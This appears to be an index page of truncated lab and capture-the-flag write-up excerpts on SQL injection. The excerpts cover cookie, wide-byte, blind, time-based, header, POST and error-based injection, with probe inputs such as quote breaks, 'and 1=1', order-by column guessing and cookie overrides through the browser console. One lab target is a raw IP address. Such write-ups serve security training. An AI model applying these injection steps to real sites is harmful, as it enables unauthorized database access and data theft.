心司 + Offset Injection
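?ID=105' triggers a popup reading "参数错误" (parameter error), which means GET injection is not allowed. Try cookie injection: press F12 and in the Console tab enter document.cookie="id=105", then refresh with F5. The page displays normally, which means the cookie can carry id in place of GET. document.cookie="id=105"+escape(" and 1=1") displays normally. document.cookie="id=10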
心司 + Cookie Injection
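Click the portal, then click any link: http://120.203.13.75:8001/shownews.asp?id=171 Test whether injection is possible: id=171' displays "传输非法字符" (illegal characters transmitted). Try cookie injection: browse to http://120.203.13.75:8001/shownews.asp, press F12 and in the Console tab write document.cookie="id=171", then press F5. The page displays normally, which means there is Coo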
心司 + Wide-Byte Injection
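6.3.1-SQL Injection-Wide-Byte Injection Rank 1 ?id=1 SELECT * FROM users WHERE id='1' LIMIT 0,1 Following the page's instructions, the result is displayed correctly. ?id=1' %23 SELECT * FROM users WHERE id='1\' #' LIMIT 0,1 According to the echoed SQL statement, the single quote in the submitted id value is escaped and the whole id value is parsed as a string, which means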
心司 + Time-Based Injection
6.4.1-SQL Injection-Time-Delay Injection Rank 1 ?id=1 Your sql statement is SELECT * FROM users WHERE id='1' LIMIT 0,1 ?id=2 Your sql statement is SELECT * FROM users WHERE id='2' LIMIT 0,1 According to the echoed output, the value of id is placed into the s
心司 + Blind Injection
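6.2.1-SQL Injection-Blind Injection Rank 1 ?id=1 Your sql statement is SELECT * FROM users WHERE id='1' LIMIT 0,1 According to the echoed output, id=1' %23 gives the same result as the previous injection, which means the injection succeeded. id=1' order by 1 %23 displays correctly. id=1' order by 5 %23 displays an error. Finally, by changing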
心司 + Head Injection + 6.5.1-SQL Injection + 6.5.2-SQL Injection + 6.5.3-SQL Injection
6.5.1-SQL Injection-Header Injection Rank 1 $_SERVER["HTTP_USER_AGENT"] retrieves information about the browser. $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP',
心司 + POST Injection + 6.6.1-SQL Injection + 6.6.2-SQL Injection + 6.6.3-SQL Injection
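6.6.1-SQL Injection-Post Injection Rank 1 Information gathering: mysql, php, windows server. Penetration process: enter zkz, and the page displays SELECT username, password FROM users WHERE username='zkz' and password='zkz' LIMIT 1,1 Injection (union query; the two queries must have the same number of columns) ' and 1=2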
心司 + SQL Injection-Error-Based Injection, Challenges (1-4)
6.1.1-SQL Injection-Error-Based Injection Rank 1 ?id = 1 SELECT * FROM users WHERE id='1' LIMIT 0,1 ?id = 1' SELECT * FROM users WHERE id='1'' LIMIT 0,1 The error shows that injection exists. Next step, guess the columns: ?id=1 order by 1 SELECT * FROM users W
心司 + Regular Expressions/Practice Range/Regex Matching - Easter Egg Challenge + Solution Notes
Audit the code: <?php $key='flag{********************************}'; $Regular= preg_match("/zkaq.*key.{2,9}:\/.*\/(key*key)/i", trim($_GET["id"
心司 + PHP + MYSQL Login Form + Solution Notes
phhmysql.html <!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=devi